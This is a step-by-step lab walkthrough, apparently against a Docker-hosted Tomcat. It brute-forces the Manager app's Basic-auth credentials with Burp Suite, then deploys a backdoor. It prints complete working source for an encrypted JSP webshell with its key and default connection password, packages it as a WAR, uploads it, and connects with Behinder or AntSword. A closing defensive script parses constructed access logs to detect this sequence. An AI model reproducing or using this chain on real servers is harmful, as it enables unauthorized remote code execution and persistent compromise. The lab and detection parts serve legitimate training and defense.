1. Start the lab (the vulnerable target environment)
Locate the lab files
Enter the lab directory
Launch the lab:
docker-compose up -d
2. Check the IP address of the target
3. Scan the IP with nmap
The scan shows port 8080 open, serving Apache Tomcat.
4. Browse to that port on the target IP
Click "Manager App"
6. Turn on Burp Suite (BP) to capture the request
Enter any account name and password.
Note this part of the captured request: the credentials are base64-encoded (HTTP Basic authentication).
7. Base64-decode the value
Decoder tab output.
The decoded content is 11111:11111, the account and password we just entered; the colon in the middle is the separator.
8. Brute-force the account and password
Mark the base64 value as a payload position (variable).
Set the first position; 1 corresponds to the username.
Select the dictionary to use.
After selecting it, click Add.
Select the second position.
It corresponds to the colon in user:password.
Since the colon is fixed, no dictionary is needed; just enter ":" as the payload.
Click Add again.
Setup of the second position is complete.
Select 3 to set the third position.
The third position corresponds to the password part of user:password.
Select a dictionary and load it.
Click Add.
Under payload processing, add a base64-encode rule.
Since Burp URL-encodes special characters by default, uncheck the default Payload Encoding option, otherwise the "=" padding of the base64 value would be mangled.
Start the attack.
Click the result with status code 200.
View the request.
Select the previously marked value and send it to the Decoder module for decoding:
tomcat:tomcat
This is the username and password.
9. Log in with that account
Login successful.
10. Prepare a JSP Trojan horse (webshell)
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*this key is the first 16 characters of the 32-character MD5 of the connection password; the default connection password is rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
11. Make a WAR package
Compress the .jsp file into a .zip archive.
Change the .zip suffix to .war.
12. Deploy the WAR package on Tomcat
Upload the .war package just made in the "WAR file to deploy" section.
Click Deploy.
13. Check whether the x.war package appears in the application list, which confirms the upload succeeded
Here the upload has succeeded.
14. Access the .jsp file just uploaded
For example, if the uploaded package is x.war and the file inside it is x.jsp, the URL is
http://192.168.189.131:8080/x/x.jsp
and so on for other names.
A blank page means success.
15. Connect with Behinder (Ice Scorpion) or AntSword
Connection password: rebeyond
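From the defending side, the whole sequence above leaves a characteristic trail in Tomcat's access log: a burst of 401 responses on the Manager app from one client, then a 200 carrying an authenticated user, then a POST to the Manager upload handler. The detection script below is an added example, not part of this walkthrough; the log lines are constructed, and the client addresses (10.0.0.x), the failure threshold and the `analyze` function are my own assumptions.

```python
import re
from collections import defaultdict

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
MANAGER_PREFIX = "/manager/"
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy")
FAIL_THRESHOLD = 5  # Manager 401s from one client before we call it guessing (assumed)

# Constructed sample log: six failed Manager logins from 10.0.0.5, then a
# successful one as "tomcat", then a WAR upload; plus unrelated traffic.
SAMPLE_LOG = "\n".join(
    [f'10.0.0.5 - - [10/Mar/2024:10:00:0{i} +0000] "GET /manager/html HTTP/1.1" 401 2473'
     for i in range(1, 7)]
    + [
        '10.0.0.5 - tomcat [10/Mar/2024:10:00:09 +0000] "GET /manager/html HTTP/1.1" 200 17345',
        '10.0.0.5 - tomcat [10/Mar/2024:10:00:30 +0000] "POST /manager/html/upload'
        '?org.apache.catalina.filters.CSRF_NONCE=ABCD1234 HTTP/1.1" 303 0',
        '10.0.0.9 - - [10/Mar/2024:10:01:00 +0000] "GET /manager/html HTTP/1.1" 401 2473',
        '10.0.0.7 - - [10/Mar/2024:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 11156',
    ]
)

def analyze(log_text):
    """Per client IP: count Manager 401s, note the user of the first success that
    follows a burst of failures, and record deployment requests that succeeded."""
    findings = defaultdict(lambda: {"failed": 0, "guessed_user": None, "deployed": []})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # tolerate lines in another log format
        ip, user, method, path, status = m.group("ip", "user", "method", "path", "status")
        clean_path = path.split("?", 1)[0]
        if not clean_path.startswith(MANAGER_PREFIX):
            continue
        f = findings[ip]
        if status == "401":
            f["failed"] += 1
        elif status[0] in "23":
            if f["failed"] >= FAIL_THRESHOLD and f["guessed_user"] is None:
                f["guessed_user"] = user if user != "-" else "(unknown)"
            if method in ("POST", "PUT") and clean_path in DEPLOY_PATHS:
                f["deployed"].append(clean_path)
    # Report only addresses that brute-forced the Manager app or deployed something.
    return {ip: f for ip, f in findings.items() if f["failed"] >= FAIL_THRESHOLD or f["deployed"]}
```

A single 401 from 10.0.0.9 stays below the threshold and is not reported; the same logic applies unchanged to the text-interface path /manager/text/deploy used by scripted deployments.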